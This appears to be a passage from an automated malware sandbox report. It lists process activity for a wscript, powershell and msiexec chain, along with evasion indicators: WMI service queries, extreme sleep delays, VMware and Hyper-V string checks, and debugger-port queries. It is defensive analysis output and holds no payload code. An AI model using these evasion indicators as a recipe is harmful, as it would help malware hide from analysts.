              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3455A530 push eax; iretd 2_2_00007FFD3455A539
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04ED2F05 push esp; retn 07D9h4_2_04ED3631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592806 push ecx; ret 9_2_23592819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select *from Win32_Service
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4966Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4876Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6319Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3465Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\wscript.exe TID: 1112Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512Thread sleep count: 1288 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512Thread sleep time: -3864000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512Thread sleep count: 8697 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512Thread sleep time: -26091000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_235910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_235910F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23596580 FindFirstFileExA,9_2_23596580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.2141386198.00000223299BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.2124542532.0000022327AFB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140965686.0000022327B22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139424436.0000022327B1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWne
              Source: wscript.exe, 00000000.00000003.2139783943.00000223299B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.2139242350.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123988097.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2124657554.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2141513610.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2291119459.000001DB62D30000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000002.2141824589.0000022329A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_13-34025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D2D6CC LdrInitializeThunk,LdrInitializeThunk,4_2_04D2D6CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_23592639
